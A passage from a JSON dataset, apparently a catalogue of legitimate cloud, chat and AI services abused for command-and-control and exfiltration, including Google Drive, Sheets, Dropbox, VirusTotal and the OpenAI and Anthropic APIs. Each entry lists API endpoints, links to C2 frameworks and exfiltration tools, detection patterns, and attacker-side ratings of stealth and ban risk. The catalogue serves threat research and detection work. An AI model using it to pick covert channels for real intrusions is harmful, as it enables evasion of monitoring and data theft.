      "exfil": 0,
      "payload": 0,
      "creds": 0
    },
    "apiEndpoints": [
      "www.googleapis.com/calendar/v3/calendars/*/events*"
    ],
    "opsec": "low",
    "opsecNotes": "Calendar events as C2 instructions. Extremely stealthy - calendar API traffic blends perfectly. 2 C2 frameworks + APT41 reference",
    "socDetection": "unlikely",
    "banRisk": "low",
    "banNotes": "Calendar API traffic perfectly blends with legitimate usage. Zero detection coverage",
    "verification": "Google account only",
    "trust": "high",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": true,
      "trialDays": null,
      "limits": "Free \u00b7 Calendar API with OAuth \u00b7 No rate limits for personal use"
    },
    "sso": {
      "saml": false,
      "oidc": false,
      "scim": false,
      "oauth": true,
      "mfa": true,
      "notes": "Google OAuth for API \u00b7 Part of Workspace SSO"
    },
    "knownC2": [
      {
        "name": "GCR-Google Calendar RAT",
        "url": "https://github.com/MrSaighnal/GCR-Google-Calendar-RAT"
      },
      {
        "name": "MeetC2",
        "url": "https://github.com/deriv-security/MeetC2"
      },
      {
        "name": "APT41 Campaign",
        "url": "https://cloud.google.com/blog/topics/threat-intelligence/apt41-innovative-tactics"
      }
    ],
    "exfilTools": [],
    "mitre": [
      "T1102.002"
    ],
    "refs": [
      {
        "title": "Calendar API Docs",
        "url": "https://developers.google.com/calendar/api"
      },
      {
        "title": "lolc2 - Google Calendar",
        "url": "https://lolc2.github.io"
      }
    ],
    "detection": [
      "www.googleapis.com/calendar/v3/calendars/*/events*"
    ],
    "notes": "2 lolc2 C2 frameworks + APT41 real-world usage. Calendar events as dead drops. Detection: suspicious user-agents (Python/curl/Go-http-client) targeting calendar.googleapis.com. APT41 used Google Calendar in real attacks",
    "customDomain": false,
    "customDomainNotes": "N/A",
    "dataRetention": "Permanent",
    "rateLimits": "Calendar API: 1M queries/day",
    "maxFileSize": "N/A",
    "logging": "Workspace Audit Logs",
    "lolc2Url": "https://lolc2.github.io/#google-calendar"
  },
  {
    "name": "Google Drive",
    "url": "https://drive.google.com",
    "category": "C2 Channel",
    "provider": "Google",
    "signup": "email",
    "signupTime": "~1min",
    "domains": [
      "drive.google.com",
      "*.googleusercontent.com"
    ],
    "trustedDomain": true,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 1,
      "c2": 1,
      "exfil": 1,
      "payload": 1,
      "creds": 0
    },
    "apiEndpoints": [
      "www.googleapis.com/drive/*",
      "www.googleapis.com/upload/drive/v3/files*"
    ],
    "opsec": "low",
    "opsecNotes": "4 lolc2 C2 frameworks. Google Drive for file-based C2 and exfil. 15GB free storage",
    "socDetection": "unlikely",
    "banRisk": "low",
    "banNotes": "Drive API blends with legitimate usage. Sharing notifications trusted everywhere",
    "verification": "Google account. 15GB free",
    "trust": "high",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": false,
      "trialDays": null,
      "limits": "15GB free (shared Gmail/Drive/Photos) \u00b7 750GB upload/day \u00b7 API 12k queries/day"
    },
    "sso": {
      "saml": true,
      "oidc": true,
      "scim": true,
      "oauth": true,
      "mfa": true,
      "notes": "Workspace SAML/OIDC \u00b7 OAuth consent phishing for Drive scope"
    },
    "knownC2": [
      {
        "name": "google_socks",
        "url": "https://github.com/lukebaggett/google_socks"
      },
      {
        "name": "Rust-DriveC2",
        "url": "https://github.com/DannyPenten/Rust-DriveC2"
      },
      {
        "name": "C3/GoogleDrive",
        "url": "https://github.com/WithSecureLabs/C3"
      },
      {
        "name": "GC2-sheet",
        "url": "https://github.com/looCiprian/GC2-sheet"
      }
    ],
    "exfilTools": [
      {
        "name": "gdrive",
        "url": "https://lolexfil.github.io/#tool=Google%20Drive%20CLI%20/%20gdrive",
        "note": ""
      },
      {
        "name": "rclone",
        "url": "https://lolexfil.github.io/#tool=rclone",
        "note": ""
      },
      {
        "name": "duplicati",
        "url": "https://lolexfil.github.io/#tool=duplicati",
        "note": ""
      },
      {
        "name": "Cyberduck",
        "url": "https://lolexfil.github.io/#tool=Cyberduck",
        "note": ""
      },
      {
        "name": "FreeFileSync",
        "url": "https://lolexfil.github.io/#tool=FreeFileSync",
        "note": ""
      },
      {
        "name": "GoodSync",
        "url": "https://lolexfil.github.io/#tool=GoodSync",
        "note": ""
      },
      {
        "name": "Syncovery",
        "url": "https://lolexfil.github.io/#tool=Syncovery",
        "note": ""
      },
      {
        "name": "Arq Backup",
        "url": "https://lolexfil.github.io/#tool=Arq%20Backup",
        "note": ""
      }
    ],
    "mitre": [
      "T1567.002",
      "T1566.002",
      "T1102.002"
    ],
    "refs": [
      {
        "title": "Google One Plans",
        "url": "https://one.google.com/about/plans"
      },
      {
        "title": "Drive API Docs",
        "url": "https://developers.google.com/drive/api"
      },
      {
        "title": "lolc2 - Google Drive",
        "url": "https://lolc2.github.io"
      },
      {
        "title": "lolexfil",
        "url": "https://lolexfil.github.io"
      },
      {
        "title": "Symantec: Firefly Espionage Group Uses Google Drive Client for Exfiltration",
        "url": "https://www.security.com/threat-intelligence/graph-api-threats"
      }
    ],
    "detection": [
      "www.googleapis.com/drive/*",
      "www.googleapis.com/upload/drive/v3/files*",
      "oauth2.googleapis.com/token"
    ],
    "notes": "4 lolc2 C2 frameworks including google_socks (SOCKS proxy over Drive), Rust-DriveC2, C3/GoogleDrive channel, GC2-sheet. Also major exfil target via rclone/DET. Firefly espionage group used Google Drive Python client for exfiltration from military organization in Southeast Asia (Symantec 2024)",
    "customDomain": false,
    "customDomainNotes": "N/A - file storage",
    "dataRetention": "Permanent (15GB free shared)",
    "rateLimits": "Drive API: 12k queries/day",
    "maxFileSize": "5TB per file",
    "logging": "Workspace Audit Logs, Drive activity",
    "lolc2Url": "https://lolc2.github.io/#google-drive"
  },
  {
    "name": "Google Sheets",
    "url": "https://sheets.google.com",
    "category": "C2 Channel",
    "provider": "Google",
    "signup": "email",
    "signupTime": "~1min",
    "domains": [
      "docs.google.com",
      "sheets.googleapis.com"
    ],
    "trustedDomain": true,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 1,
      "c2": 1,
      "exfil": 0,
      "payload": 0,
      "creds": 1
    },
    "apiEndpoints": [
      "sheets.googleapis.com/v4/spreadsheets/*"
    ],
    "opsec": "low",
    "opsecNotes": "Sheets as C2 backend - used by APT41 (Voldemort malware). Apps Script for automation",
    "socDetection": "unlikely",
    "banRisk": "low",
    "banNotes": "Sheets API traffic indistinguishable from legitimate automation",
    "verification": "Google account only",
    "trust": "high",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": true,
      "trialDays": null,
      "limits": "Free \u00b7 API unlimited \u00b7 Apps Script 6min exec/day \u00b7 15GB shared storage"
    },
    "sso": {
      "saml": true,
      "oidc": true,
      "scim": true,
      "oauth": true,
      "mfa": true,
      "notes": "Part of Google Workspace SSO \u00b7 OAuth for API"
    },
    "knownC2": [
      {
        "name": "GC2-Sheet",
        "url": "https://github.com/looCiprian/GC2-sheet"
      },
      {
        "name": "Google RAT",
        "url": "https://github.com/a-rey/google_RAT"
      }
    ],
    "exfilTools": [],
    "mitre": [
      "T1102.002",
      "T1566.002",
      "T1204.001"
    ],
    "refs": [
      {
        "title": "Google Sheets API",
        "url": "https://developers.google.com/sheets/api"
      },
      {
        "title": "Voldemort malware",
        "url": "https://www.intel471.com/blog/detecting-malware-abusing-google-for-c2"
      },
      {
        "title": "lolc2 - Google Sheet",
        "url": "https://lolc2.github.io"
      }
    ],
    "detection": [
      "sheets.googleapis.com/*",
      "sheets.googleapis.com/v4/spreadsheets/*:batchUpdate",
      "sheets.googleapis.com/v4/spreadsheets/*/values/*"
    ],
    "notes": "2 lolc2 C2 frameworks. GC2-Sheet used in the wild by APT41 (Voldemort malware). Sheets as C2 database - cells for commands, responses, and file staging. Apps Script for automation",
    "customDomain": false,
    "customDomainNotes": "N/A - spreadsheet",
    "dataRetention": "Permanent",
    "rateLimits": "Sheets API: 300 req/min per project",
    "maxFileSize": "10M cells per spreadsheet",
    "logging": "Workspace Audit Logs",
    "lolc2Url": "https://lolc2.github.io/#google-sheet"
  },
  {
    "name": "Google Slides",
    "url": "https://slides.google.com",
    "category": "C2 Channel",
    "provider": "Google",
    "signup": "email",
    "signupTime": "~1min",
    "domains": [
      "slides.googleapis.com"
    ],
    "trustedDomain": true,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 1,
      "c2": 1,
      "exfil": 0,
      "payload": 0,
      "creds": 0
    },
    "apiEndpoints": [
      "slides.googleapis.com/v1/presentations/*"
    ],
    "opsec": "low",
    "opsecNotes": "Slides speaker notes as C2 dead drops. GSR framework uses batchUpdate for C2 comms",
    "socDetection": "unlikely",
    "banRisk": "low",
    "banNotes": "Extremely niche C2 channel. Zero detection coverage",
    "verification": "Google account only",
    "trust": "high",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": true,
      "trialDays": null,
      "limits": "Free \u00b7 API with OAuth"
    },
    "sso": {
      "saml": false,
      "oidc": false,
      "scim": false,
      "oauth": true,
      "mfa": true,
      "notes": "Google OAuth for API"
    },
    "knownC2": [
      {
        "name": "GSR-Google Slides RAT",
        "url": "https://github.com/MrSaighnal/GSR-Google-Slides-RAT"
      }
    ],
    "exfilTools": [],
    "mitre": [
      "T1102.002"
    ],
    "refs": [
      {
        "title": "Slides API",
        "url": "https://developers.google.com/slides/api"
      },
      {
        "title": "lolc2 - Google Slides",
        "url": "https://lolc2.github.io"
      }
    ],
    "detection": [
      "slides.googleapis.com/v1/presentations/*",
      "slides.googleapis.com/v1/presentations/*:batchUpdate"
    ],
    "notes": "1 lolc2 C2 framework (GSR). Speaker notes in Slides as C2 dead drops. batchUpdate API for writing commands. Creative and unexpected channel",
    "customDomain": false,
    "customDomainNotes": "N/A - presentation",
    "dataRetention": "Permanent",
    "rateLimits": "Slides API: 300 req/min",
    "maxFileSize": "N/A",
    "logging": "Workspace Audit Logs",
    "lolc2Url": "https://lolc2.github.io/#google-slides"
  },
  {
    "name": "Google Translate",
    "url": "https://translate.google.com",
    "category": "C2 Channel",
    "provider": "Google",
    "signup": "none",
    "signupTime": "0",
    "domains": [
      "translate.google.com",
      "*.translate.goog"
    ],
    "trustedDomain": true,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 1,
      "c2": 1,
      "exfil": 0,
      "payload": 0,
      "creds": 0
    },
    "apiEndpoints": [
      "translate.google.com/translate?*"
    ],
    "opsec": "low",
    "opsecNotes": "Google Translate proxy to render attacker-controlled pages through trusted *.translate.goog domain. No signup needed",
    "socDetection": "unlikely",
    "banRisk": "low",
    "banNotes": "No account needed. Proxy requests blend with normal translate usage",
    "verification": "No signup required",
    "trust": "high",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": false,
      "trialDays": null,
      "limits": "Free \u00b7 No account needed \u00b7 Proxies any URL through trusted Google domain"
    },
    "sso": {
      "saml": false,
      "oidc": false,
      "scim": false,
      "oauth": false,
      "mfa": false,
      "notes": "No auth needed"
    },
    "knownC2": [
      {
        "name": "BabyShark",
        "url": "https://github.com/UnkL4b/BabyShark"
      },
      {
        "name": "GTRS",
        "url": "https://github.com/mthbernardes/GTRS"
      }
    ],
    "exfilTools": [],
    "mitre": [
      "T1102.002",
      "T1090.004"
    ],
    "refs": [
      {
        "title": "lolc2 - Google Translate",
        "url": "https://lolc2.github.io"
      }
    ],
    "detection": [
      "translate.google.com/translate?&anno=2&u=*",
      "*.translate.goog"
    ],
    "notes": "2 lolc2 C2 frameworks. Proxies attacker C2 pages through trusted *.translate.goog domain. NO SIGNUP needed. Detection: high-frequency polling of translated sites, Base64 payloads in translated URLs. BabyShark creates /tmp/input and /tmp/output files",
    "customDomain": false,
    "customDomainNotes": "N/A - translation API",
    "dataRetention": "No data stored",
    "rateLimits": "No explicit rate limit for web. API: 600k chars/min",
    "maxFileSize": "5k chars per request (web)",
    "logging": "No logging for anonymous use",
    "lolc2Url": "https://lolc2.github.io/#google-translate"
  },
  {
    "name": "Dropbox",
    "url": "https://dropbox.com",
    "category": "C2 Channel",
    "provider": "Dropbox",
    "signup": "email",
    "signupTime": "~2min",
    "domains": [
      "dropbox.com",
      "api.dropboxapi.com",
      "content.dropboxapi.com"
    ],
    "trustedDomain": true,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 1,
      "c2": 1,
      "exfil": 1,
      "payload": 1,
      "creds": 0
    },
    "apiEndpoints": [
      "api.dropboxapi.com/*",
      "content.dropboxapi.com/*"
    ],
    "opsec": "low",
    "opsecNotes": "4 lolc2 C2 frameworks including Empire listener. Trusted domain for phishing via share notifications",
    "socDetection": "moderate",
    "banRisk": "medium",
    "banNotes": "Dropbox scans shared links for malware. API tokens revoked on abuse report",
    "verification": "Email only. Phone optional. CC for Business",
    "trust": "high",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": true,
      "trialDays": null,
      "limits": "2GB storage \u00b7 3 devices \u00b7 API rate limited \u00b7 Business trial 30 days"
    },
    "sso": {
      "saml": true,
      "oidc": false,
      "scim": true,
      "oauth": true,
      "mfa": true,
      "notes": "SAML/SCIM on Business+ ($15/u/mo) \u00b7 OAuth2 for API"
    },
    "knownC2": [
      {
        "name": "DBC2",
        "url": "https://github.com/Arno0x/DBC2"
      },
      {
        "name": "pac2",
        "url": "https://github.com/NTT-Security-Japan/pac2"
      },
      {
        "name": "C3/Dropbox",
        "url": "https://github.com/WithSecureLabs/C3"
      },
      {
        "name": "Empire/Dropbox",
        "url": "https://github.com/BC-SECURITY/Empire"
      }
    ],
    "exfilTools": [
      {
        "name": "Dropbox-Uploader",
        "url": "https://lolexfil.github.io/#tool=Dropbox%20CLI%20/%20Dropbox-Uploader",
        "note": ""
      },
      {
        "name": "rclone",
        "url": "https://lolexfil.github.io/#tool=rclone",
        "note": ""
      },
      {
        "name": "duplicati",
        "url": "https://lolexfil.github.io/#tool=duplicati",
        "note": ""
      },
      {
        "name": "Cyberduck",
        "url": "https://lolexfil.github.io/#tool=Cyberduck",
        "note": ""
      }
    ],
    "mitre": [
      "T1102.002",
      "T1567.002",
      "T1071.001",
      "T1566.002"
    ],
    "refs": [
      {
        "title": "Dropbox Plans",
        "url": "https://www.dropbox.com/plans"
      },
      {
        "title": "Dropbox SSO/SAML",
        "url": "https://help.dropbox.com/security/single-sign-on"
      },
      {
        "title": "Dropbox API",
        "url": "https://www.dropbox.com/developers/documentation"
      },
      {
        "title": "lolc2 - Dropbox",
        "url": "https://lolc2.github.io"
      },
      {
        "title": "lolexfil",
        "url": "https://lolexfil.github.io"
      }
    ],
    "detection": [
      "api.dropboxapi.com/2/files/*",
      "content.dropboxapi.com/2/files/download",
      "content.dropboxapi.com/2/files/upload"
    ],
    "notes": "4 lolc2 C2 frameworks: DBC2, pac2, C3 channel, Empire listener. Detection: Empire user-agent 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0)'. Trusted domain for share notification phishing",
    "customDomain": false,
    "customDomainNotes": "N/A - file storage",
    "dataRetention": "Permanent (2GB free)",
    "rateLimits": "API: 200 calls/min data. 600 calls/min metadata",
    "maxFileSize": "2GB free, 50GB per file on paid",
    "logging": "Admin console on Business. Activity logs",
    "lolc2Url": "https://lolc2.github.io/#dropbox"
  },
  {
    "name": "VirusTotal",
    "url": "https://virustotal.com",
    "category": "C2 Channel",
    "provider": "Google",
    "signup": "email",
    "signupTime": "~2min",
    "domains": [
      "www.virustotal.com"
    ],
    "trustedDomain": true,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 0,
      "c2": 1,
      "exfil": 1,
      "payload": 0,
      "creds": 0
    },
    "apiEndpoints": [
      "www.virustotal.com/api/v3/*/comments",
      "www.virustotal.com/api/v2/*/comments"
    ],
    "opsec": "low",
    "opsecNotes": "File comments as C2 dead drops. Nobody expects VT traffic to be malicious. 4 known C2 frameworks",
    "socDetection": "unlikely",
    "banRisk": "low",
    "banNotes": "Nobody expects VT traffic to be C2. Comments API rarely monitored",
    "verification": "Email only. API key free",
    "trust": "high",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": true,
      "trialDays": null,
      "limits": "Free API: 4 req/min \u00b7 500 req/day \u00b7 15.5k/mo"
    },
    "sso": {
      "saml": false,
      "oidc": false,
      "scim": false,
      "oauth": false,
      "mfa": true,
      "notes": "API key auth \u00b7 No SSO"
    },
    "knownC2": [
      {
        "name": "VirusTotalC2",
        "url": "https://github.com/RATandC2/VirusTotalC2"
      },
      {
        "name": "VirusTotalC2 (D1rkMtr)",
        "url": "https://github.com/D1rkMtr/VirusTotalC2"
      },
      {
        "name": "REC2",
        "url": "https://github.com/g0h4n/REC2"
      },
      {
        "name": "SharpHungarian",
        "url": "https://github.com/samuelriesz/SharpHungarian"
      }
    ],
    "exfilTools": [],
    "mitre": [
      "T1102.002"
    ],
    "refs": [
      {
        "title": "VT API Docs",
        "url": "https://docs.virustotal.com/reference/overview"
      },
      {
        "title": "lolc2 - VirusTotal",
        "url": "https://lolc2.github.io"
      }
    ],
    "detection": [
      "www.virustotal.com/api/v3/*/comments",
      "www.virustotal.com/api/v2/*/comments"
    ],
    "notes": "4 lolc2 C2 frameworks. VT file comments as C2 channel - incredibly creative. Nobody expects VirusTotal traffic to be malicious C2. SharpHungarian uses VT comments for stealth C2",
    "customDomain": false,
    "customDomainNotes": "N/A - analysis platform",
    "dataRetention": "Permanent (all uploads)",
    "rateLimits": "API: 4 req/min free. 1000 req/day",
    "maxFileSize": "650MB per file",
    "logging": "All uploads are public and permanently stored",
    "lolc2Url": "https://lolc2.github.io/#virustotal"
  },
  {
    "name": "Zulip",
    "url": "https://zulipchat.com",
    "category": "C2 Channel",
    "provider": "Zulip",
    "signup": "email",
    "signupTime": "~2min",
    "domains": [
      "*.zulipchat.com"
    ],
    "trustedDomain": false,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 0,
      "c2": 1,
      "exfil": 1,
      "payload": 0,
      "creds": 0
    },
    "apiEndpoints": [
      "*.zulipchat.com/api/v1/messages*",
      "*.zulipchat.com/api/v1/user_uploads*",
      "*.zulipchat.com/api/v1/get_stream_id*"
    ],
    "opsec": "low",
    "opsecNotes": "Very rarely monitored. Obscure platform. API-based C2",
    "socDetection": "unlikely",
    "banRisk": "low",
    "banNotes": "Obscure platform. Zero abuse enforcement for C2",
    "verification": "Email only",
    "trust": "low",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": true,
      "trialDays": null,
      "limits": "Free cloud hosting for small orgs \u00b7 Self-hosted unlimited"
    },
    "sso": {
      "saml": true,
      "oidc": true,
      "scim": false,
      "oauth": true,
      "mfa": true,
      "notes": "SAML/OIDC on self-hosted \u00b7 Cloud has limited SSO"
    },
    "knownC2": [
      {
        "name": "goZulipC2",
        "url": "https://github.com/n1k7l4i/goZulipC2"
      }
    ],
    "exfilTools": [],
    "mitre": [
      "T1102.002"
    ],
    "refs": [
      {
        "title": "Zulip Pricing",
        "url": "https://zulip.com/plans/"
      },
      {
        "title": "Zulip API",
        "url": "https://zulip.com/api/"
      },
      {
        "title": "lolc2 - Zulip",
        "url": "https://lolc2.github.io"
      }
    ],
    "detection": [
      "*.zulipchat.com/api/v1/messages*",
      "*.zulipchat.com/api/v1/user_uploads*"
    ],
    "notes": "1 lolc2 C2 framework (goZulipC2). Obscure platform - unlikely to be in any SOC's detection rules. API for messages and file uploads",
    "customDomain": true,
    "customDomainNotes": "Custom domains on self-hosted",
    "dataRetention": "Permanent (self-hosted: unlimited)",
    "rateLimits": "API: 200 req/min",
    "maxFileSize": "25MB per file (cloud)",
    "logging": "No audit logs on free cloud",
    "lolc2Url": "https://lolc2.github.io/#zulip"
  },
  {
    "name": "Matrix",
    "url": "https://matrix.org",
    "category": "C2 Channel",
    "provider": "Matrix.org",
    "signup": "email",
    "signupTime": "~1min",
    "domains": [
      "matrix.org",
      "*.matrix.org"
    ],
    "trustedDomain": false,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 0,
      "c2": 1,
      "exfil": 1,
      "payload": 0,
      "creds": 0
    },
    "apiEndpoints": [
      "matrix.org/_matrix/client/r0/rooms/*/send/*",
      "matrix.org/_matrix/client/r0/rooms/*/messages"
    ],
    "opsec": "low",
    "opsecNotes": "Decentralized protocol. E2E encryption. Self-hostable. 2 known C2 frameworks",
    "socDetection": "unlikely",
    "banRisk": "low",
    "banNotes": "Decentralized - no central authority to ban. Self-hostable",
    "verification": "Email only on matrix.org. Self-hosted = full control",
    "trust": "low",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": true,
      "trialDays": null,
      "limits": "Free \u00b7 Self-hostable \u00b7 matrix.org homeserver free"
    },
    "sso": {
      "saml": false,
      "oidc": true,
      "scim": false,
      "oauth": true,
      "mfa": true,
      "notes": "OIDC on Element client \u00b7 Self-hosted can integrate any IdP"
    },
    "knownC2": [
      {
        "name": "goMatrixC2",
        "url": "https://github.com/n1k7l4i/goMatrixC2"
      },
      {
        "name": "goMatrixC2 (fork)",
        "url": "https://github.com/opensesamedoors/goMatrixC2"
      }
    ],
    "exfilTools": [],
    "mitre": [
      "T1102.002",
      "T1573.002"
    ],
    "refs": [
      {
        "title": "Matrix.org Free",
        "url": "https://matrix.org/try-matrix/"
      },
      {
        "title": "Matrix API Spec",
        "url": "https://spec.matrix.org/latest/client-server-api/"
      },
      {
        "title": "lolc2 - Matrix",
        "url": "https://lolc2.github.io"
      }
    ],
    "detection": [
      "matrix.org/_matrix/client/r0/rooms/*/send/m.room.message",
      "matrix.org/_matrix/client/r0/rooms/*/messages"
    ],
    "notes": "2 lolc2 C2 frameworks. Decentralized, E2E encrypted protocol. Self-hostable for ultimate OPSEC. Cannot be taken down by a single provider",
    "customDomain": true,
    "customDomainNotes": "Custom domains on self-hosted homeserver",
    "dataRetention": "Permanent (self-hosted: unlimited)",
    "rateLimits": "Varies by homeserver. matrix.org rate limited",
    "maxFileSize": "100MB per file (matrix.org)",
    "logging": "Homeserver admin logs. No central audit",
    "lolc2Url": "https://lolc2.github.io/#matrix"
  },
  {
    "name": "OpenAI / ChatGPT",
    "url": "https://openai.com",
    "category": "C2 Channel",
    "provider": "OpenAI",
    "signup": "email",
    "signupTime": "~2min",
    "domains": [
      "api.openai.com",
      "files.oaiusercontent.com"
    ],
    "trustedDomain": true,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 0,
      "c2": 1,
      "exfil": 1,
      "payload": 0,
      "creds": 0
    },
    "apiEndpoints": [
      "api.openai.com/v1/files*",
      "api.openai.com/v1/files/*/content*"
    ],
    "opsec": "low",
    "opsecNotes": "2 lolc2 C2 frameworks. Abuse OpenAI Files API for dead drops. Traffic blends with legitimate AI API usage",
    "socDetection": "unlikely",
    "banRisk": "medium",
    "banNotes": "OpenAI monitors API usage. Files API may be reviewed. Safety team active",
    "verification": "Email + phone. CC for API usage beyond free credits",
    "trust": "high",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": true,
      "trialDays": null,
      "limits": "Free ChatGPT tier \u00b7 API pay-per-use \u00b7 $5 credit for new devs"
    },
    "sso": {
      "saml": false,
      "oidc": false,
      "scim": false,
      "oauth": true,
      "mfa": true,
      "notes": "OAuth for API \u00b7 SAML on Enterprise"
    },
    "knownC2": [
      {
        "name": "ratchatpt",
        "url": "https://github.com/spartan-conseil/ratchatpt"
      },
      {
        "name": "LargeLanguageC2",
        "url": "https://github.com/Trivulzianus/LargeLanguageC2"
      }
    ],
    "exfilTools": [],
    "mitre": [
      "T1102.002"
    ],
    "refs": [
      {
        "title": "OpenAI API Docs",
        "url": "https://platform.openai.com/docs"
      },
      {
        "title": "lolc2 - OpenAI",
        "url": "https://lolc2.github.io"
      }
    ],
    "detection": [
      "api.openai.com/v1/files*",
      "files.oaiusercontent.com*"
    ],
    "notes": "2 lolc2 C2 frameworks. Files API for dead drops - upload commands as files, retrieve results. Traffic blends perfectly with legitimate AI API usage. Detection: unusual POST/GET patterns to /v1/files endpoints",
    "customDomain": false,
    "customDomainNotes": "N/A - AI API",
    "dataRetention": "Files: 60 days retention",
    "rateLimits": "API: tier-based. Free: 3 RPM, 200 RPD",
    "maxFileSize": "512MB per file (API)",
    "logging": "Usage dashboard. Organization audit log",
    "lolc2Url": "https://lolc2.github.io/#openai"
  },
  {
    "name": "Claude / Anthropic",
    "url": "https://anthropic.com",
    "category": "C2 Channel",
    "provider": "Anthropic",
    "signup": "email",
    "signupTime": "~2min",
    "domains": [
      "api.anthropic.com"
    ],
    "trustedDomain": true,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 0,
      "c2": 1,
      "exfil": 1,
      "payload": 0,
      "creds": 0
    },
    "apiEndpoints": [
      "api.anthropic.com/v1/messages",
      "api.anthropic.com/v1/files",
      "api.anthropic.com/v1/files/*/content"
    ],
    "opsec": "low",
    "opsecNotes": "1 lolc2 C2 framework. Abuse Claude API files for dead drops. Emerging technique",
    "socDetection": "unlikely",
    "banRisk": "medium",
    "banNotes": "Anthropic monitors API usage. Safety team active but Files API is new",
    "verification": "Email required. CC for API usage",
    "trust": "high",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": true,
      "trialDays": null,
      "limits": "Free Claude tier \u00b7 API pay-per-use \u00b7 Free tier available"
    },
    "sso": {
      "saml": false,
      "oidc": false,
      "scim": false,
      "oauth": true,
      "mfa": true,
      "notes": "OAuth for API \u00b7 SAML on Enterprise"
    },
    "knownC2": [
      {
        "name": "Claude-C2",
        "url": "https://github.com/dmcxblue/Claude-C2"
      }
    ],
    "exfilTools": [],
    "mitre": [
      "T1102.002"
    ],
    "refs": [
      {
        "title": "Anthropic API Docs",
        "url": "https://docs.anthropic.com/"
      },
      {
        "title": "lolc2 - Claude",
        "url": "https://lolc2.github.io"
      },
      {
        "title": "THN: ClickFix Campaign Uses Claude.ai Links via Google Ads",
        "url": "https://thehackernews.com/2026/02/microsoft-discloses-dns-based-clickfix.html"
      }
    ],
    "detection": [
      "api.anthropic.com/v1/messages",
      "api.anthropic.com/v1/files",
      "api.anthropic.com/v1/files/*/content"
    ],
    "notes": "1 lolc2 C2 framework (Claude-C2). Uses Anthropic Files API and message_batches for C2. Emerging technique - not yet in any detection rules. ClickFix campaigns use Claude.ai links via Google Ads sponsored results to install stealer malware - 'The ad shows a real, recognized domain (claude.ai), not a spoof' (AdGuard/THN Feb 2026)",
    "customDomain": false,
    "customDomainNotes": "N/A - AI API",
    "dataRetention": "No file retention stated",
    "rateLimits": "API: tier-based. 5 RPM on free tier",
    "maxFileSize": "32MB per file (API)",
    "logging": "Usage dashboard",
    "lolc2Url": "https://lolc2.github.io/#claude"
  },
  {
    "name": "Mastodon",
    "url": "https://mastodon.social",
    "category": "C2 Channel",
    "provider": "Mastodon",
    "signup": "email",
    "signupTime": "~1min",
    "domains": [
      "mastodon.social",
      "mastodon.be",
      "*.mastodon.*"
    ],
    "trustedDomain": false,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 0,
      "c2": 1,
      "exfil": 0,
      "payload": 0,
      "creds": 0
    },
    "apiEndpoints": [
      "mastodon.*/api/v1/statuses*"
    ],
    "opsec": "low",
    "opsecNotes": "Decentralized social network. Any instance can be used. REC2 framework",
    "socDetection": "unlikely",
    "banRisk": "low",
    "banNotes": "Decentralized - instance admins are the only moderators. Self-hostable",
    "verification": "Email only per instance. Self-hosted = no verification",
    "trust": "low",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": true,
      "trialDays": null,
      "limits": "Free \u00b7 Decentralized \u00b7 Self-hostable \u00b7 Any instance works"
    },
    "sso": {
      "saml": false,
      "oidc": false,
      "scim": false,
      "oauth": true,
      "mfa": false,
      "notes": "OAuth for API \u00b7 No centralized SSO"
    },
    "knownC2": [
      {
        "name": "REC2",
        "url": "https://github.com/g0h4n/REC2"
      }
    ],
    "exfilTools": [],
    "mitre": [
      "T1102.002"
    ],
    "refs": [
      {
        "title": "Mastodon API",
        "url": "https://docs.joinmastodon.org/api/"
      },
      {
        "title": "lolc2 - Mastodon",
        "url": "https://lolc2.github.io"
      }
    ],
    "detection": [
      "mastodon.*/api/v1/statuses*",
      "mastodon.*/api/v1/statuses/*/context"
    ],
    "notes": "1 lolc2 C2 framework (REC2). Decentralized - self-host your own instance for ultimate OPSEC. Statuses as C2 commands. Multiple instances available",
    "customDomain": true,
    "customDomainNotes": "Custom domains on self-hosted instances",
    "dataRetention": "Permanent (self-hosted)",
    "rateLimits": "API: 300 req/5min",
    "maxFileSize": "40MB video, 10MB image",
    "logging": "Admin dashboard per instance",
    "lolc2Url": "https://lolc2.github.io/#mastodon"
  },
  {
    "name": "WhatsApp",
    "url": "https://web.whatsapp.com",
    "category": "C2 Channel",
    "provider": "Meta",
    "signup": "phone",
    "signupTime": "~3min",
    "domains": [
      "*.whatsapp.net",
      "web.whatsapp.com"
    ],
    "trustedDomain": true,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 0,
      "c2": 1,
      "exfil": 1,
      "payload": 0,
      "creds": 0
    },
    "apiEndpoints": [
      "v.whatsapp.net/v2/*"
    ],
    "opsec": "low",
    "opsecNotes": "XMPP-based C2 via WhatsApp Web automation. E2E encrypted. 1 known framework",
    "socDetection": "unlikely",
    "banRisk": "medium",
    "banNotes": "Meta actively bans automation. Yowsup/unofficial clients detected and banned",
    "verification": "Phone number required. No anonymous signup",
    "trust": "high",
    "lastVerified": "2026-03",
